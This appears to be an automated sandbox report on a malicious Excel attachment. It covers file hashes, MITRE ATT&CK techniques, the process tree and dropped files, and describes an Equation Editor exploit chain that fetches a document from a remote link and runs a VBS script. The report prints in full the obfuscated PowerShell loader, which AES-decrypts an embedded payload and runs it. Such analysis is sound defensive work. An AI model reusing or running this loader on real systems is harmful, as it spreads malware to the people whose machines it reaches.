5080e38aaf9a00af84a5baf06d1eeb1881dd24a389ff719add6b7b650d1ddaea

General

Target

PG_320_MPI SRL_20240607_100526.xls
Size

1.0MB
MD5

f75d330398f3c1726675357616731264
SHA1

a7fb3d4e0a71bc522df5334d1d2efb92207f1065
SHA256

5080e38aaf9a00af84a5baf06d1eeb1881dd24a389ff719add6b7b650d1ddaea
SHA512

ef036ae3d6b6ba092e2e3cf8f224b0953cc27d35a975b0b22ec28dde9d91754379b16d36fb5736fb74f877d75f57c370cdc9eef9fa7f09af2d253d16d605ac08
SSDEEP

24576:LYIK07NB11N0TCpToIw6Duf+074LHb6yreOXU0DyYP2rKP035S:LhKi/2WtDE74L2yr/9DyGM35S

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
11	1112	EQNEDT32.EXE
14	2524	WScript.exe
16	2524	WScript.exe
17	2276	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Office\14.0\Common	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Office\Common\Offline\Files\http://tny.wtf/vo	WINWORD.EXE

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2276	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1112	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
328	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2276	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeShutdownPrivilege	1088	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
328	EXCEL.EXE
328	EXCEL.EXE
328	EXCEL.EXE
1088	WINWORD.EXE
1088	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 2524	1112	EQNEDT32.EXE	34
PID 1112 wrote to memory of 2524	1112	EQNEDT32.EXE	34
PID 1112 wrote to memory of 2524	1112	EQNEDT32.EXE	34
PID 1112 wrote to memory of 2524	1112	EQNEDT32.EXE	34
PID 1088 wrote to memory of 2672	1088	WINWORD.EXE	35
PID 1088 wrote to memory of 2672	1088	WINWORD.EXE	35
PID 1088 wrote to memory of 2672	1088	WINWORD.EXE	35
PID 1088 wrote to memory of 2672	1088	WINWORD.EXE	35
PID 2524 wrote to memory of 2276	2524	WScript.exe	36
PID 2524 wrote to memory of 2276	2524	WScript.exe	36
PID 2524 wrote to memory of 2276	2524	WScript.exe	36
PID 2524 wrote to memory of 2276	2524	WScript.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\PG_320_MPI SRL_20240607_100526.xls"
1⤵
- Abuses OpenXML format to download file from external location
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:328

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2672

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI00669725676900661955908584003901CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI6WdXDNL1QOiTNMpTmj3GP4fuhNEJiNeCYvt+bi9HmaeB+pnzXo0qd3bcCYQwOu26eR2WeL4DLDIoGpCtWrOc3+IDX1Zg1T8lQ87otzzWi+T/L0YPQop+bdw0lY34zryaUifKKDho7O3XAiN5Ag419Dmmeg6FoljemPC/VzaixMzAMGup3hIrL3W90fn7WPFXxNie5Kx1h/OVwYAPqAjt9JkXqX9pbQ8qBPG0Ld8UXKhyyvpnjHr7xbxc/lTGHhyb4O688cdVijjodbdyQvGipBWexdYqjMGvEKkJjIGNV/BdF0foq1Ap3jVAC98mohO7essgjuBtNPtWpwRZHSE0i0ZsQaQ9Ug7cAy5hUChH2uM74rBm+jzd7LXuICbKcNnIY+jOSzeU5ONhicSfpfceKi7ve7gq6922dRWEH5ZMi5PBuhDsZczV74Zr433TL6xRqUg9L9ik5AGPow6bOVE0NZ4/YyzxnXA4tFi+ye8pfPGi1HQ620JFmMlW/c48T6feiLN5jNd8rfxBpSGogQ9RigX9171GY+bMOp0DrmFGnapeguEsSjUysn2kNWx+mSqYYfid6qe5AYvmQWBFSoQMgMO1hPOPkq3+PQilJe+Rn3pq2DZvdUFJY7g04so1tpE4rSIoLYQkcAVoy7zeO/lhOPKETIcY8t6uxGzQFzddMK7RjWzt5OxszXtRmFWRcMMaHM9bB8+3yalrRMMCGsN2NcxqSWkemfeWMMpFrvSi9naLZaW3pjU3mUhnCeSdE8WT3YjSUOhm1aE9zFfB3MDUAqB0WNmkRU9uqU4vxdt8AzP+HoBMAbAwOcWYi/24xV3Z8UTWLXZiwie9jAU0JR0b7n5PogpmxGVPm4t41EjfVWW/MH++PdCq34Vso1KgxJYI6f3oiq26sk4bl5WHvf76uN4aStUk2nQDZEza1bQoAH0IcePgM//31NdQEwyTgU0U9LtqDJdG/4OR1wqXv0l0m7nlkObWp0TGmljp4c0shQ27F4EwDqzXpAMUwzMaDQ+Qt4SqT6m5p8bjU0PrVxspYd/zZtwpNb56tHebQmw93+yZrXvMleQMIRvz7AJOBNZSQUTNq66mmQcoqgA698P+3dbTO3NkxSGI8E/yFdDuOH/LgPcl2hp1jYapVtcegTW1zXuwTs4CITWZF9XAJY/GFglyMPJ1v9ftJ02v7AP8oO6lTN9ESbYYGG4h2UXbk5fqq3o8f3L+ppiVEpxFnqQmbp4UPGq2eR4+ZhHUNAg9DI7b2lGUjZqgl65aFyOCJXVZDG1Gb/Um9HGgVH3jjRRrBzAmSVpcyMSPW+jcD8Ju624QnIjGeV0yHL7g+dzDK/hBBnfcQ2/3GRGFPucwKg10578K0dCz6plSdfhxEQpEndVv1aCVKZXmRLr39XRYMMD9zYJ6QuDUZGGLxN46AqhiaQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
    3⤵
    - Blocklisted process makes network request
    - Drops file in System32 directory
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{967EA584-A151-4274-9BED-8AE0FEA94E02}.FSD

Filesize
128KB

MD5
5c83dea367b1ea5ba3b9b0de6159bc63

SHA1
9f2279066ab5ecfe637807b868f84e4cbf79cfb3

SHA256
e55c4d0e815d05ce88d93336e29e35e259674b7a8e0d6a423e6dc3bc5a30a1e1

SHA512
55bece0914c4033210298632bff3283bd59c9f3c663cac9113f0cd4281371ca138f4725ea57274bbad5848b59b4af8775ab47ef5897b03ebe5bc70e7de14af8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
8d987fc88b7334929e97a2dc74359e4e

SHA1
6f319ea5419130a38e92090965f4cecf6423afc7

SHA256
f5687eb83a47cc7b0366a60ea5e2f210ff5a3e22db268df2f9fbb91a6b976d0c

SHA512
0342ae0c8871416ad02157fa96b4c82911be86c828da4075cea0e075fafe9165cac051a40cfeb16c57ca8b0d9ac06f59c1b6b86786ca538d4d05d4ab1ad0340f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC535D87-538B-4DAE-84AF-ED2242504F7C}.FSD

Filesize
128KB

MD5
09408095a287d76517797ced447d605d

SHA1
d78de6f06bb95f4684b769b884f7345e63388c16

SHA256
4e7d86a5d5716cfa6842b7a676f3faf83f4687e310a4ac8da6e491694cc49be2

SHA512
e24fd560b4933b7efd2a39f07f1916c712ec8b6f22c348ee985f00adec50c611b82b53b1b046debeb160f35c4248fae23551a70f20dd5712e9cf7c6f3b322c04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\simplethingshappeningnewthingstobegetinbackmywordsintheworldthingstogetbackheresheisgreatthingstobeinline________________sheiswhattogetbacksheisgreat[1].doc

Filesize
110KB

MD5
e628ee1f2b81b8972f53e2b2785d97a1

SHA1
0fa0fe5809f166d707fdcf3a2a866b92a761a92b

SHA256
8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d

SHA512
cfb5abf034fb4105fa1f5b23f40b3070427bb862c701fab29457caf15f1f100be6103d783380490cf6afddc7291db17a75f6ab1e19a82e2650072a94eebb6093

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4UQ4J2DQ\paste1[1].txt

Filesize
156B

MD5
ad6c37ef980373e9bcbd14810fad34bc

SHA1
9c061a1b3608b7c7f1db7cd06c8246913ee11bda

SHA256
ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c

SHA512
30dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f

Download Submit
C:\Users\Admin\AppData\Local\Temp\{2CFA23CC-D712-46EC-A379-90618FA4701F}

Filesize
128KB

MD5
4e95bb1e425688226d5f74db6d646f8c

SHA1
a8aa3231e286f653ece44d3fdaeae3825b736ffd

SHA256
96da1306a33f2d3f17f8feef70ac6a2d969093c077cb4454774d249a4ce89964

SHA512
6fae9eccb235cd90599500bb71a570c94d781cb91620c0edc2bf11462e3c965e351e7dfb0ca16846c1c58534dddba10b60e316a6164c85d8a1b159d26200392f

Download Submit
C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS

Filesize
54KB

MD5
cfbf2e7faea58e9249d4e5f6520851a2

SHA1
b27795e6e6282d7d3888ab39f77ad314139497fc

SHA256
89c3771f859200a6c3e2d7aea98d0e4c2c21741d9d2117e47dfc2849523be39a

SHA512
c5e71d2cd63debf13c2c57807aaeb819f2077423c8ce86770c7d803054fa9f02304fff646ea8f018198089ac2ca1d565a2faab93916be86ff357c6c529e5c164

Download Submit
memory/328-8-0x0000000001E60000-0x0000000001E62000-memory.dmp

Filesize
8KB

Download
memory/328-1-0x0000000072AFD000-0x0000000072B08000-memory.dmp

Filesize
44KB

Download
memory/328-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/328-109-0x0000000072AFD000-0x0000000072B08000-memory.dmp

Filesize
44KB

Download
memory/1088-7-0x00000000038E0000-0x00000000038E2000-memory.dmp

Filesize
8KB

Download
memory/1088-5-0x0000000072AFD000-0x0000000072B08000-memory.dmp

Filesize
44KB

Download
memory/1088-3-0x000000002FF41000-0x000000002FF42000-memory.dmp

Filesize
4KB

Download
memory/1088-110-0x0000000072AFD000-0x0000000072B08000-memory.dmp

Filesize
44KB

Download
memory/1088-127-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1088-128-0x0000000072AFD000-0x0000000072B08000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing